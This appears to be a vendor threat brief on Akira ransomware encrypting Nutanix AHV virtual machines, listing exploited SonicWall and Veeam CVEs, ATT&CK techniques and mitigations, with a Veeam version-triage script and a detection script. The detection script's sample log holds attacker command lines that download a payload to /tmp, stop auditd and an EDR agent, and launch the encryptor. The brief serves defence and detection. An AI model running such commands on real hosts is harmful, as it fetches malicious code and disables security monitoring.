Executive Summary
In mid-2025, affiliates of the Akira ransomware operation extended their Linux encryptor to Nutanix AHV virtual machine (VM) disk files, according to an updated joint advisory from CISA, the FBI and partner agencies; the group's Linux tooling had previously concentrated on VMware ESXi. Using stolen credentials or exploited edge-device and backup-server vulnerabilities for access, the attackers reached the virtualization layer and ran the encryptor against the files backing entire Nutanix VM environments, taking every guest on the affected storage offline in a single run. For victims this meant disrupted critical workloads, extended downtime, and the double-extortion pressure of data theft combined with encryption.
This incident underscores the trend of ransomware groups moving from individual endpoints to the virtualization and backup layers, where one encryption job affects many workloads at once. The Akira campaign shows how quickly the group adapts its TTPs to new platforms and why segmentation and lateral-movement controls inside virtualized environments have become urgent.
Why This Matters Now
Virtualization platforms such as Nutanix AHV are attractive ransomware targets because encrypting the disk files at the hypervisor layer takes down every guest VM they back. The Akira attack illustrates the need to secure not just endpoints but also internal traffic, lateral movement paths and the VM environment itself. As more critical business operations migrate to virtualized and cloud infrastructure, these methods are an evolving threat that requires updated defenses now rather than after the next incident.
Attack Path Analysis
The Akira ransomware affiliates first gained access to the environment hosting the Nutanix AHV Linux workloads, most likely through an exposed edge service or stolen credentials. Once inside, they escalated privileges to administrative control over the virtualization and backup layers. They then moved laterally along east-west network paths within the infrastructure to discover and reach additional hosts and VMs, and established command and control, potentially over encrypted or covert channels, to maintain persistence. Data was staged for exfiltration ahead of impact, but the primary objective was to encrypt the VM disk files and disrupt services by deploying the Linux encryptor against the Nutanix AHV environment.
Kill Chain Progression
Initial Compromise
Description
Adversaries breached the environment hosting the Nutanix AHV VMs, typically via an exposed service (Akira affiliates frequently use VPN appliances without MFA), a misconfiguration, or compromised credentials.
Related CVEs
CVE-2024-40766
CVSS 9.3. An improper access control vulnerability in the SonicWall SonicOS management access and SSLVPN interfaces allows unauthenticated remote attackers to reach restricted resources and, under specific conditions, crash the firewall; Akira affiliates have used it against SSLVPN accounts for initial access.
Affected Products:
SonicWall SonicOS – Gen 5, Gen 6, Gen 7
Exploit Status:
Exploited in the wild (listed in CISA's Known Exploited Vulnerabilities catalog)
CVE-2023-27532
CVSS 7.5. A flaw in the Veeam Backup & Replication backup service (TCP port 9401) lets an unauthenticated user on the backup network obtain the encrypted credentials stored in the configuration database, which can lead to access to the backup infrastructure hosts.
Affected Products:
Veeam Backup & Replication – 12 (build 12.0.0.1420 and earlier without hotfix P20230223) and 11a (build 11.0.1.1261 and earlier without hotfix P20230227)
Exploit Status:
Exploited in the wild
CVE-2024-40711
CVSS 9.8. Deserialization of untrusted data in Veeam Backup & Replication allows unauthenticated remote code execution.
Affected Products:
Veeam Backup & Replication – 12.1.2.172 and all earlier version 12 builds (fixed in 12.2)
Exploit Status:
Exploited in the wild (Akira and Fog ransomware intrusions have been reported using it)
CVE-2025-23114
CVSS 9.0. A vulnerability in the Veeam Updater component allows a man-in-the-middle attacker to execute arbitrary code with root privileges on the affected appliance.
Affected Products:
Veeam Backup for Nutanix AHV – 5.0, 5.1 (other Veeam Backup appliances that ship the same Updater component are affected as well)
Exploit Status:
Proof of concept
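As an added check (example code written for this page, not tooling from the advisory, CISA or Veeam), the following script triages a constructed host inventory against the three Veeam CVEs above. It parses build strings into numeric tuples so that "12.2.0.334" sorts after "12.1.2.172", applies build thresholds taken from Veeam's knowledge base articles, and handles the awkward case where a hotfixed build reports exactly the same version number as an unpatched one. Host names, the inventory layout and the build strings in the sample data are assumptions.

```python
"""Triage a host inventory against the Veeam CVEs listed above.

Added example for this page; it is not code from the advisory, CISA or Veeam.
Build thresholds used: CVE-2024-40711 affects Backup & Replication 12.1.2.172
and earlier version-12 builds (fixed in 12.2); CVE-2023-27532 affects 12.0.0.1420
and earlier unless hotfix P20230223 is applied, and version 11a builds unless
hotfix P20230227 is applied; CVE-2025-23114 is matched on Veeam Backup for
Nutanix AHV 5.0 and 5.1 as named on this page. The inventory records are
constructed sample data, and the rule predicates are this example's own.
"""
from dataclasses import dataclass
from typing import Callable, Dict, List, Tuple

Build = Tuple[int, ...]


def parse_build(version: str) -> Build:
    """'12.1.2.172' -> (12, 1, 2, 172), so builds compare numerically, not as strings."""
    return tuple(int(part) for part in version.strip().split("."))


# Hotfixed builds keep the same build number, so they cannot be told apart from
# unpatched ones by version string alone (CVE-2023-27532 edge case).
HOTFIX_ONLY_BUILDS = {(12, 0, 0, 1420): "P20230223", (11, 0, 1, 1261): "P20230227"}

# (product name as reported by the inventory, CVE, predicate over the parsed build)
VEEAM_RULES: List[Tuple[str, str, Callable[[Build], bool]]] = [
    ("Veeam Backup & Replication", "CVE-2024-40711",
     lambda b: b[0] == 12 and b <= (12, 1, 2, 172)),
    ("Veeam Backup & Replication", "CVE-2023-27532",
     lambda b: b[0] == 11 or b <= (12, 0, 0, 1420)),
    ("Veeam Backup for Nutanix AHV", "CVE-2025-23114",
     lambda b: b[:2] in ((5, 0), (5, 1))),
]


@dataclass(frozen=True)
class Finding:
    host: str
    product: str
    version: str
    cve: str
    action: str


def triage(inventory: List[Dict[str, str]]) -> List[Finding]:
    """Return one Finding per (host, CVE) that the inventory version still exposes."""
    findings: List[Finding] = []
    for item in inventory:
        build = parse_build(item["version"])
        for product, cve, vulnerable in VEEAM_RULES:
            if item["product"] != product or not vulnerable(build):
                continue
            action = "upgrade to a fixed build"
            if cve == "CVE-2023-27532" and build in HOTFIX_ONLY_BUILDS:
                action = f"verify hotfix {HOTFIX_ONLY_BUILDS[build]} is installed"
            findings.append(Finding(item["host"], product, item["version"], cve, action))
    return findings


SAMPLE_INVENTORY = [  # constructed records; host names and build strings are illustrative
    {"host": "vbr-01", "product": "Veeam Backup & Replication", "version": "12.1.2.172"},
    {"host": "vbr-02", "product": "Veeam Backup & Replication", "version": "12.2.0.334"},
    {"host": "vbr-03", "product": "Veeam Backup & Replication", "version": "12.0.0.1420"},
    {"host": "vbahv-01", "product": "Veeam Backup for Nutanix AHV", "version": "5.1.0.70"},
    {"host": "vbahv-02", "product": "Veeam Backup for Nutanix AHV", "version": "6.0.0.10"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_INVENTORY):
        print(f"{f.host:<10} {f.product} {f.version:<12} {f.cve}: {f.action}")
```

Feed it the product and version strings your asset inventory already exports; the point of the numeric tuple comparison is that a plain string compare would rank "12.10" below "12.2", and the hotfix branch is there because a build number alone cannot prove CVE-2023-27532 is closed on a 12.0.0.1420 server.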
MITRE ATT&CK® Techniques
Valid Accounts (T1078)
System Services: Service Execution (T1569.002)
Command and Scripting Interpreter: Unix Shell (T1059.004)
Impair Defenses: Disable or Modify Tools (T1562.001)
Ingress Tool Transfer (T1105)
Data Encrypted for Impact (T1486)
Resource Hijacking (T1496)
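To show how these techniques surface in host telemetry, here is an added example (written for this page, not code from the advisory or its sources) that runs simple rules over constructed, simplified Linux host event lines and labels each hit with its ATT&CK ID, then derives the kill-chain progression from the order of first observation. The event format, host names, the jump-host subnet in ALLOWED_ADMIN_NETS and the SECURITY_SERVICES names are assumptions; the ".akira" extension and "akira_readme.txt" note are the markers reported for Akira's Linux encryptor, and since affiliates rotate variants they should be treated as illustrative rather than as a complete indicator list.

```python
"""Map constructed Linux host telemetry to the ATT&CK techniques listed above.

Added example, not part of the advisory and not code from CISA, Nutanix or any
Akira analysis. The log lines are constructed in a simplified one-event-per-line
layout; the field names, host names, the ALLOWED_ADMIN_NETS jump-host subnet and
the SECURITY_SERVICES agent names are assumptions made for this demonstration.
"""
import ipaddress
import re
from collections import Counter
from typing import List, Optional

ALLOWED_ADMIN_NETS = [ipaddress.ip_network("10.20.0.0/24")]   # assumed jump-host range
SECURITY_SERVICES = {"auditd", "rsyslog", "edr-agent"}         # assumed agent names
ENCRYPTED_EXT = ".akira"          # extension reported for the Akira Linux encryptor
RANSOM_NOTE = "akira_readme.txt"  # ransom note name reported for the same variant

LINE_RE = re.compile(r"^(?P<ts>\S+) host=(?P<host>\S+) type=(?P<type>\S+) ?(?P<rest>.*)$")
KV_RE = re.compile(r'(\w+)="([^"]*)"|(\w+)=(\S+)')


def parse_line(line: str) -> Optional[dict]:
    """Split 'ts host=.. type=.. k=v k="v with spaces"' into a dict, or None if malformed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ev = {"ts": m["ts"], "host": m["host"], "type": m["type"]}
    for k1, v1, k2, v2 in KV_RE.findall(m["rest"]):
        ev[k1 or k2] = v1 if k1 else v2
    return ev


def _hit(ev: dict, technique: str, detail: str) -> dict:
    return {"ts": ev["ts"], "host": ev["host"], "technique": technique, "detail": detail}


def detect(lines: List[str], rename_threshold: int = 5) -> List[dict]:
    """Run the technique rules over the events. A per-host rename counter turns a
    burst of '.akira' renames into a single T1486 finding when it reaches the threshold."""
    findings, renames = [], Counter()
    for raw in lines:
        ev = parse_line(raw)
        if ev is None:
            continue
        if ev["type"] == "auth" and ev.get("result") == "accepted":
            src = ipaddress.ip_address(ev["src"])
            if not any(src in net for net in ALLOWED_ADMIN_NETS):
                findings.append(_hit(ev, "T1078", f"{ev['user']} accepted from {src}"))
        elif ev["type"] == "proc":
            cmd = ev.get("cmd", "")
            if re.match(r"(curl|wget)\b", cmd) and re.search(r"(/tmp|/dev/shm)/", cmd):
                findings.append(_hit(ev, "T1105", f"download to scratch dir: {cmd}"))
            if re.match(r"(ba)?sh -c\b", cmd):
                findings.append(_hit(ev, "T1059.004", f"shell wrapper: {cmd}"))
            m = re.match(r"systemctl (stop|disable) (\S+)", cmd)
            if m and m.group(2) in SECURITY_SERVICES:
                findings.append(_hit(ev, "T1562.001", f"{m.group(1)} {m.group(2)}"))
        elif ev["type"] == "file":
            path = ev.get("path", "")
            if path.endswith(RANSOM_NOTE):
                findings.append(_hit(ev, "T1486", f"ransom note written: {path}"))
            elif ev.get("op") == "rename" and path.endswith(ENCRYPTED_EXT):
                renames[ev["host"]] += 1
                if renames[ev["host"]] == rename_threshold:
                    findings.append(_hit(ev, "T1486",
                                         f"{rename_threshold} files renamed to {ENCRYPTED_EXT}"))
    return findings


def kill_chain(findings: List[dict]) -> List[str]:
    """Distinct techniques in order of first observation, i.e. the observed progression."""
    return list(dict.fromkeys(f["technique"] for f in findings))


SAMPLE_LOG = """\
2025-06-12T02:13:05Z host=ahv-01 type=auth user=svc_backup result=accepted src=203.0.113.45
2025-06-12T02:13:40Z host=ahv-01 type=proc user=svc_backup cmd="curl -sS http://203.0.113.45/agent -o /tmp/.x"
2025-06-12T02:13:41Z host=ahv-01 type=proc user=svc_backup cmd="chmod +x /tmp/.x"
2025-06-12T02:14:02Z host=ahv-01 type=proc user=root cmd="systemctl stop auditd"
2025-06-12T02:14:03Z host=ahv-01 type=proc user=root cmd="systemctl disable edr-agent"
2025-06-12T02:15:10Z host=ahv-01 type=proc user=root cmd="bash -c 'nohup /tmp/.x /mnt/vmstore &'"
2025-06-12T02:15:11Z host=ahv-01 type=file op=rename path=/mnt/vmstore/db-01.qcow2.akira
2025-06-12T02:15:11Z host=ahv-01 type=file op=rename path=/mnt/vmstore/db-02.qcow2.akira
2025-06-12T02:15:12Z host=ahv-01 type=file op=rename path=/mnt/vmstore/app-01.qcow2.akira
2025-06-12T02:15:12Z host=ahv-01 type=file op=rename path=/mnt/vmstore/app-02.qcow2.akira
2025-06-12T02:15:13Z host=ahv-01 type=file op=rename path=/mnt/vmstore/web-01.qcow2.akira
2025-06-12T02:15:30Z host=ahv-01 type=file op=create path=/mnt/vmstore/akira_readme.txt
2025-06-12T08:00:00Z host=ahv-02 type=auth user=ops result=accepted src=10.20.0.15
2025-06-12T08:00:10Z host=ahv-02 type=file op=rename path=/mnt/vmstore/app-01.qcow2.bak
""".splitlines()   # constructed sample telemetry, not real logs

if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ts']} {f['host']} {f['technique']:<10} {f['detail']}")
    print("progression:", " -> ".join(kill_chain(hits)))
```

The rename threshold is the part worth tuning: a single renamed file is noise, but several disk-image renames to one unfamiliar extension on a virtualization host within seconds is the moment to isolate that host, and the ransom note is usually written only after the damage is done. The second host in the sample shows the negative case: an admin login from the expected subnet and an ordinary ".bak" rename produce no findings.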
Potential Compliance Exposure
Mapping incident impact across multiple compliance frameworks.
PCI DSS 4.0 – Authenticate access to system components
Control ID: 8.2.4
NYDFS 23 NYCRR 500 – Cybersecurity Policy
Control ID: 500.03
DORA – ICT Risk Management
Control ID: Article 13
CISA ZTMM 2.0 – Continuous Asset Monitoring
Control ID: Asset Management #3
NIS2 Directive – Incident Handling and Business Continuity
Control ID: Article 21(2)(b) and (c)
Sector Implications
Industry-specific impact of the vulnerabilities, including operational, regulatory, and cloud security risks.
Health Care / Life Sciences
Akira ransomware targeting Nutanix VMs threatens patient data encryption, disrupting critical healthcare operations while violating HIPAA compliance requirements for data protection.
Financial Services
Ransomware attacks on virtualized banking infrastructure risk encrypted customer data, transaction systems disruption, and non-compliance with PCI DSS security standards.
Government Administration
CISA's warning highlights government agencies' vulnerability to Akira ransomware encrypting virtual machines, potentially compromising sensitive data and critical public services.
Information Technology/IT
IT organizations using Nutanix virtualization face direct ransomware exposure, requiring enhanced zero trust segmentation, threat detection, and multicloud security controls.
Sources
- CISA warns of Akira ransomware Linux encryptor targeting Nutanix VMs (BleepingComputer): https://www.bleepingcomputer.com/news/security/cisa-warns-of-akira-ransomware-linux-encryptor-targeting-nutanix-vms/
- Response to CISA Security Advisory Related to a Third-Party Vulnerability (Nutanix): https://www.nutanix.com/blog/response-to-cisa-security-advisory-related-to-a-third-party-vulnerability-allowing-the-targeting-of-major-hypervisor-vendors
- Akira Ransomware Now Targeting Nutanix VMs (TechRadar): https://www.techradar.com/pro/security/akira-ransomware-is-now-targeting-nutanix-vms-and-scoring-big-rewards
Cloud Native Security Fabric (CNSF) Mitigations and Controls
Zero Trust segmentation, east-west traffic controls and real-time threat detection across virtualized and cloud workloads would have constrained this intrusion at several stages: least-privilege policy limits what a stolen account can reach, workload isolation keeps a compromised host from discovering and reaching other VMs, inline inspection surfaces command-and-control traffic, and egress policy stops unauthorized data leaving the environment. Together these CNSF-aligned controls shrink the encryptor's reach rather than relying on a single perimeter check.
Control: Cloud Firewall (ACF)
Mitigation: Blocks unauthorized inbound access to exposed services such as VPN and backup management interfaces.
Control: Zero Trust Segmentation
Mitigation: Prevents broad administrative rights from propagating across workloads.
Control: East-West Traffic Security
Mitigation: Stops lateral movement between workloads and segments.
Control: Inline IPS (Suricata)
Mitigation: Detects and blocks malicious or suspicious command-and-control traffic.
Control: Egress Security & Policy Enforcement
Mitigation: Suppresses unauthorized or sensitive outbound data flows, limiting exfiltration ahead of encryption.
Rapid detection of and response to these ransomware TTPs limits the damage once any single control is bypassed.
Impact at a Glance
Affected Business Functions
- Virtualization Infrastructure
- Data Storage
- Backup and Recovery
Estimated downtime: 5 days
Estimated loss: $500,000
Potential exposure of sensitive virtual machine data, including customer information and proprietary business data.
Recommended Actions
Key Takeaways & Next Steps
- Enforce granular Zero Trust Segmentation and workload isolation to prevent lateral movement within virtualized and cloud environments.
- Implement East-West Traffic Security and inline IPS controls to block suspicious intra-cloud and egress communications.
- Deploy robust Egress Security & Policy Enforcement to detect and prevent unauthorized data exfiltration attempts by ransomware.
- Continuously monitor for threats using real-time anomaly response and automated alerting across cloud workloads.
- Regularly review and update cloud firewall policies to restrict exposure of management interfaces (hypervisor, backup and VPN) and other sensitive services.